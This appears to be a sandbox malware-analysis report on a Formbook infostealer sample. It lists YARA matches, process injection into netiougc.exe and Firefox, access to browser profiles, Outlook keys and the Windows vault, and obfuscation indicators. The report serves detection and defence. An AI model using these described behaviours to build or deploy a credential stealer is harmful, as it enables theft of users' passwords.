            Source: C:\Users\user\Desktop\indent PWS-020199.exe, Code function: String function: 0153F290 appears 103 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exe, Code function: String function: 01507E54 appears 107 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exe, Code function: String function: 014AB970 appears 262 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exe, Code function: String function: 014F5130 appears 58 times
            Source: C:\Users\user\Desktop\indent PWS-020199.exe, Code function: String function: 0152EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netiougc.exe, Code function: String function: 03A6F290 appears 103 times
            Source: C:\Windows\SysWOW64\netiougc.exe, Code function: String function: 03A37E54 appears 107 times
            Source: C:\Windows\SysWOW64\netiougc.exe, Code function: String function: 039DB970 appears 262 times
            Source: C:\Windows\SysWOW64\netiougc.exe, Code function: String function: 03A25130 appears 58 times
            Source: C:\Windows\SysWOW64\netiougc.exe, Code function: String function: 03A5EA12 appears 86 times
            Source: indent PWS-020199.exe, Static PE information: invalid certificate
            Source: indent PWS-020199.exe, 00000000.00000002.1684583267.000000000B670000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000000.1660465288.00000000010A0000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1680983268.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000000.00000002.1681604026.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamenetiougc.exej% vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, 00000002.00000002.1974261923.00000000015AD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, Binary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe
            Source: indent PWS-020199.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: indent PWS-020199.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\indent PWS-020199.exe.logJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\netiougc.exeFile created: C:\Users\user\AppData\Local\Temp\3e3-f82uJump to behavior
            Source: indent PWS-020199.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netiougc.exe, 00000007.00000003.2203860120.0000000003387000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2904358299.0000000003387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: netiougc.exe, 00000007.00000002.2904358299.00000000033B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE field_info (form_signature INTEGER NOT NULL, field_signature INTEGER NOT NULL, field_type INTEGER NOT NULL, create_time INTEGER NOT NULL, UNIQUE (form_signature, field_signature))8D;
            Source: indent PWS-020199.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
            Source: C:\Users\user\Desktop\indent PWS-020199.exeProcess created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeProcess created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"
            Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\indent PWS-020199.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: indent PWS-020199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: indent PWS-020199.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: indent PWS-020199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: netiougc.pdbGCTL source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897417864.000000000063E000.00000002.00000001.01000000.0000000C.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2904164622.000000000063E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: WsRG.pdb source: indent PWS-020199.exe
            Source: Binary string: wntdll.pdbUGP source: indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: indent PWS-020199.exe, indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: WsRG.pdbSHA256 source: indent PWS-020199.exe
            Source: Binary string: netiougc.pdb source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: indent PWS-020199.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs.Net Code: wHpy2kyWQL System.Reflection.Assembly.Load(byte[])
            Source: 7.2.netiougc.exe.402cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 8.2.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 8.0.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: 10.2.firefox.exe.21fcd08.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
            Source: indent PWS-020199.exeStatic PE information: 0xCB5C881E [Fri Feb 11 21:03:26 2078 UTC]
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040183A push ebp; ret 2_2_00401848
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004020D4 push ss; ret 2_2_004020E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00418240 push FFFFFFAAh; retf 2_2_0041824C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_004032C0 push eax; ret 2_2_004032C2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00404BF7 push cs; retf 2_2_00404C04
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A393 push ss; iretd 2_2_0041A497
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040CBA0 push es; retf 2_2_0040CBA9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00401C71 push ebp; ret 2_2_00401C8A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040D425 push eax; iretd 2_2_0040D427
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A4D6 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A4E3 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A489 push ss; iretd 2_2_0041A497
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0041A546 push ebp; retf 2_2_0041A553
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417DAD push eax; ret 2_2_00417DB6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00401647 push ebp; ret 2_2_00401648
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417EB3 push eax; iretd 2_2_00417EB4
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0040CF9F push eax; ret 2_2_0040CFEF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_00417FA0 push eax; ret 2_2_00417FA5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148225F pushad ; ret 2_2_014827F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014827FA pushad ; ret 2_2_014827F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD push ecx; mov dword ptr [esp], ecx2_2_014B09B6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148283D push eax; iretd 2_2_01482858
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0148135E push eax; iretd 2_2_01481369
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_039E09AD push ecx; mov dword ptr [esp], ecx7_2_039E09B6
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224BF0 push eax; iretd 7_2_03224BF1
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224AEA push eax; ret 7_2_03224AF3
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224F7D push FFFFFFAAh; retf 7_2_03224F89
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03232F50 push es; retf 7_2_03232F83
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0322AF9E push edx; iretd 7_2_0322AFAD
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03224CDD push eax; ret 7_2_03224CE2
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_03227220 push ebp; retf 7_2_03227290
            Source: indent PWS-020199.exeStatic PE information: section name: .text entropy: 7.919292677582139
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, TRPo2wBCYPfKutFuFS.csHigh entropy of concatenated method names: 'wGdKU0Vyod', 'X7wKdGHFIv', 'AOCK42TKBs', 'XxeKF4nnfA', 'SnGKOoeqA7', 'LmkKMHbZty', 'k3hKwJCRQK', 'dLxKAAJ3lN', 'E84KrppEHB', 'uHFKk0cwKg'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xUdoI5QQOPp2AHoaxG.csHigh entropy of concatenated method names: 'SPXEs1nQn3', 'h83E7qpbub', 'NdbEj9K5Dq', 'Fa0ETJFvaU', 'RGAEOGCkRT', 'KOEEMI0wFQ', 'f46wrIG7Hvfus56hWQ', 'G4SItbPsFQuAe8On6U', 'IwdEEKCf4g', 'kEfEpqGe4y'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, oUGQ5e0Ew7Jp6LNjw7.csHigh entropy of concatenated method names: 'DNbZgYrNWx', 'RgeZGKZpj9', 'NuuZuX4vM8', 'VikZsQIRPB', 'wfjZ7jPoGW', 'xUiucVoTV0', 'qLmuIeRqfG', 'VBjuXuKQl2', 'M2YuqTgPj3', 'dXyuQjEsLR'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, z6XjBRPtbTRZOdnrBM6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's95kLmhbiG', 'a8ckJv6uXw', 'E7oklSGf8c', 'lHIkvdysGu', 'zATkc3S9NQ', 'AARkI00MER', 'PlskXTDRAw'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, kZcXbVPIw1Zn6RfNW6s.csHigh entropy of concatenated method names: 'rhYrh5ydZJ', 'yRyrbRB28J', 'oEIr2I0X6X', 'jg5rUKpauG', 'MlGr3kU7uo', 'Fsardw5JB8', 'W9rrBh0Nt1', 'evlr4fXWhy', 'ud5rFfQS1k', 'Grcr5I5rnH'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, uRtvZ7KOiw6njkygik.csHigh entropy of concatenated method names: 'zkXo4FNTon', 'tLgoFoSTSe', 'C7CoawrJRx', 'hL5oiCh9jR', 'BTOo0jXHJG', 'nsvoC5N4Mi', 'FLloS681hJ', 'etmofQU1Ss', 'Hllo8EdYGX', 'iEGoNb3vQU'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, a1HGTdPPnnu21Q9w4AJ.csHigh entropy of concatenated method names: 'ToString', 'cbgkpECEvi', 'yDQkyp0dWO', 'W3gkgX5cGW', 'y7ok1lSV89', 'YjakGPHGIy', 'FFEkKj1Ot9', 'vaCkuUvZEb', 'jxdAQaiTspehurA85rs', 'MUlYfmimKI2Ai3mWRde'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, te5SHnzAd3hBY88q4A.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's6BroUUqMe', 'PMXrOLuuwb', 'qB2rMZSCTk', 'kfarwwdWc3', 'GOQrAuRfmE', 'zxvrr6ZyqU', 'okWrk8DyIF'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, qE8I3ju4oDTZHje92X.csHigh entropy of concatenated method names: 'uqJO8hhp5c', 'iWdOH6tm1d', 'bXfOLm8UJc', 'f1iOJnpCAT', 'hVxOi6a9VF', 'MIlOm4ZEad', 'lwEO0701sy', 'PWiOCWhkQL', 'xtSO6W2W6O', 'zBPOSuMTjJ'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WVQI0tJtK8th22NnfE.csHigh entropy of concatenated method names: 'Dispose', 'GK8EQEG7ne', 'mWlYiHxNW3', 'sZgPPRbJ7t', 'TJ6E9XAiHZ', 'U6QEzmdw6j', 'ProcessDialogKey', 't7RYDiU8Tp', 'HyEYEFPrah', 'MfuYYCXsw5'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.csHigh entropy of concatenated method names: 'cuepg3LgHJ', 'Rn5p1UagS9', 'JF9pGUXGaV', 'AeUpKP62Zo', 'bWZpuLQFyY', 'jVBpZYbdFw', 'eNCpsXAImW', 'CsAp78phdH', 'pDjptWnK9q', 'erCpjWL9de'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, vOKSoOb1PxLDCtSJ1V.csHigh entropy of concatenated method names: 'pnHAa4UoFY', 'tAHAiWMLyA', 'A3rAmrb6pw', 'rJEA0UGiDj', 'rFvAL1fNw1', 'y2PACTyX09', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.csHigh entropy of concatenated method names: 'FAqGLAurfT', 'XD4GJvcbnF', 'MMsGl56nBT', 'dAuGvMIZJ1', 'E2DGcdsJDI', 'DqmGIxTQN7', 'LxDGXaVS4P', 'RiUGqcHlcp', 'ANeGQOhn81', 'I4yG9TEZK1'
